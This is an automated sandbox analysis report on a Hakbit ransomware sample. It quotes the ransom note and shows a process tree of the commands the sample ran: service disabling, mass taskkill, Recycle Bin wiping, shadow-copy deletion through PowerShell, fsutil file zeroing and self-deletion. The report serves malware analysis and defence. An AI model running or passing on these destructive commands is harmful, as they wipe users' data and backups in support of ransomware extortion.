Analysis

  • max time kernel
    1788s
  • max time network
    1786s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-11-2020 14:34

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note To recover your data contact the email below potentialenergy@mail.ru Key Identifier: AurLkNjAgbjanuDB/60MzNmn2c/YqPxL1asGmTG80+NCkBjZ2vXLtGUaqQTTP4IPFTyMtTI85kPMGqZ/X2wFDQUfMrKg9pzhk6mXJw7UibHl+wzHclZTbOUc16lkPinb5sMOtFkvKTS73MC5d733N7iTAyBf/D9rfqIO4VqVd5YdAeNOMw/IRvn3ifZyNPWHYKDhT/1C86gRrumhYZJkF2sbHd3CM1dpUlMDWIMSs8K16e7A1Ra2tzfbjg8z305vg7X+4IwTBnu1Sbm5YstbWZBB3k7OOlLLCH/y5+kXRi+xIKzFPBflFwlg4MKqqNj/UO2s26NWfMeqouuF9mxV1MgEEGESP9btTLyX+1xJZLY/W+OF14R3JBbqbw7G2e8j8EPB0wTgYnTmejhJUAcSTJJ/AIQrqPpCk/XgHDxzITuUEgDivP8jGIFha42gO3tXAeAQ/2sfD/wuomlDT8UGSHIgoG7Cq3RrHJDL/8yzJQrXN/H4450nuoU1CgMTRaIFgqKIZb/FeIr9jIsi/0CK/MH+QDaRvLAr+2Dfkje7UcxAa02dHx1jXc7VOFqAKdghfecAok9OWsnUjnnStgY/cxzi9uHySdRkRO2WUYcIhpvMCIJLJec3OJD0x5ip0Z6d7gI+kg3vyp2iLyQ4/QpZdERb1+uoqU+aLPywnlPJDbw= Number of files that were processed is: 1274
Emails

potentialenergy@mail.ru

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Modifies extensions of user files ⋅ 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file ⋅ 1 IoCs
  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill ⋅ 47 IoCs
  • Opens file in notepad (likely ransom note) ⋅ 1 IoCs
  • Runs ping.exe ⋅ 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 48 IoCs
  • Suspicious use of FindShellTrayWindow ⋅ 1 IoCs
  • Suspicious use of SendNotifyMessage ⋅ 1 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    Modifies extensions of user files
    Drops startup file
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      PID:3820
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      PID:2932
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      PID:1696
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      PID:3428
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      PID:2960
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:200
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1476
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3196
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1344
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2248
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2292
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2312
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3384
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3976
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2364
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2896
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3184
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3920
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2844
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2972
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4084
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1268
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2456
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4044
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4048
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      Kills process with taskkill
      PID:2104
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4116
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4196
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4240
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4260
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4300
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4348
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4384
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4428
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4504
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4548
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4600
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4632
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4692
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4716
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4756
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4784
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4868
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4936
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4964
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5004
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5076
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3428
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4256
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4268
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5584
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      Suspicious use of AdjustPrivilegeToken
      PID:5688
    • C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
      Opens file in notepad (likely ransom note)
      PID:5416
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      PID:5116
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.7 -n 3
        Runs ping.exe
        PID:4840
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=524288 “%s”
        PID:4352
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
      PID:5004
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        PID:6328

Network

MITRE ATT&CK Matrix

Command and Control

    Credential Access

    Defense Evasion

      Execution

        Exfiltration

          Impact

            Initial Access

              Lateral Movement

                Persistence

                  Privilege Escalation

                    Replay Monitor

                    00:00 00:00

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                    • memory/200-8-0x0000000000000000-mapping.dmp
                    • memory/828-1-0x0000000000610000-0x0000000000611000-memory.dmp
                    • memory/828-0-0x00007FFAEEEE0000-0x00007FFAEF8CC000-memory.dmp
                    • memory/1268-24-0x0000000000000000-mapping.dmp
                    • memory/1344-11-0x0000000000000000-mapping.dmp
                    • memory/1476-9-0x0000000000000000-mapping.dmp
                    • memory/1696-5-0x0000000000000000-mapping.dmp
                    • memory/2104-28-0x0000000000000000-mapping.dmp
                    • memory/2248-12-0x0000000000000000-mapping.dmp
                    • memory/2292-13-0x0000000000000000-mapping.dmp
                    • memory/2312-14-0x0000000000000000-mapping.dmp
                    • memory/2364-17-0x0000000000000000-mapping.dmp
                    • memory/2456-25-0x0000000000000000-mapping.dmp
                    • memory/2844-21-0x0000000000000000-mapping.dmp
                    • memory/2896-18-0x0000000000000000-mapping.dmp
                    • memory/2932-4-0x0000000000000000-mapping.dmp
                    • memory/2960-7-0x0000000000000000-mapping.dmp
                    • memory/2972-22-0x0000000000000000-mapping.dmp
                    • memory/3184-19-0x0000000000000000-mapping.dmp
                    • memory/3196-10-0x0000000000000000-mapping.dmp
                    • memory/3384-15-0x0000000000000000-mapping.dmp
                    • memory/3428-50-0x0000000000000000-mapping.dmp
                    • memory/3428-6-0x0000000000000000-mapping.dmp
                    • memory/3820-3-0x0000000000000000-mapping.dmp
                    • memory/3920-20-0x0000000000000000-mapping.dmp
                    • memory/3976-16-0x0000000000000000-mapping.dmp
                    • memory/4044-26-0x0000000000000000-mapping.dmp
                    • memory/4048-27-0x0000000000000000-mapping.dmp
                    • memory/4084-23-0x0000000000000000-mapping.dmp
                    • memory/4116-29-0x0000000000000000-mapping.dmp
                    • memory/4196-30-0x0000000000000000-mapping.dmp
                    • memory/4240-31-0x0000000000000000-mapping.dmp
                    • memory/4256-51-0x0000000000000000-mapping.dmp
                    • memory/4260-32-0x0000000000000000-mapping.dmp
                    • memory/4268-52-0x0000000000000000-mapping.dmp
                    • memory/4300-33-0x0000000000000000-mapping.dmp
                    • memory/4348-34-0x0000000000000000-mapping.dmp
                    • memory/4352-67-0x0000000000000000-mapping.dmp
                    • memory/4384-35-0x0000000000000000-mapping.dmp
                    • memory/4428-36-0x0000000000000000-mapping.dmp
                    • memory/4504-37-0x0000000000000000-mapping.dmp
                    • memory/4548-38-0x0000000000000000-mapping.dmp
                    • memory/4600-39-0x0000000000000000-mapping.dmp
                    • memory/4632-40-0x0000000000000000-mapping.dmp
                    • memory/4692-41-0x0000000000000000-mapping.dmp
                    • memory/4716-42-0x0000000000000000-mapping.dmp
                    • memory/4756-43-0x0000000000000000-mapping.dmp
                    • memory/4784-44-0x0000000000000000-mapping.dmp
                    • memory/4840-64-0x0000000000000000-mapping.dmp
                    • memory/4868-45-0x0000000000000000-mapping.dmp
                    • memory/4936-46-0x0000000000000000-mapping.dmp
                    • memory/4964-47-0x0000000000000000-mapping.dmp
                    • memory/5004-48-0x0000000000000000-mapping.dmp
                    • memory/5004-63-0x0000000000000000-mapping.dmp
                    • memory/5076-49-0x0000000000000000-mapping.dmp
                    • memory/5116-62-0x0000000000000000-mapping.dmp
                    • memory/5416-61-0x0000000000000000-mapping.dmp
                    • memory/5584-53-0x0000000000000000-mapping.dmp
                    • memory/5596-54-0x0000000000000000-mapping.dmp
                    • memory/5688-58-0x000001D6EE320000-0x000001D6EE321000-memory.dmp
                    • memory/5688-57-0x000001D6EE170000-0x000001D6EE171000-memory.dmp
                    • memory/5688-56-0x00007FFAEEEE0000-0x00007FFAEF8CC000-memory.dmp
                    • memory/5688-55-0x0000000000000000-mapping.dmp
                    • memory/6328-65-0x0000000000000000-mapping.dmp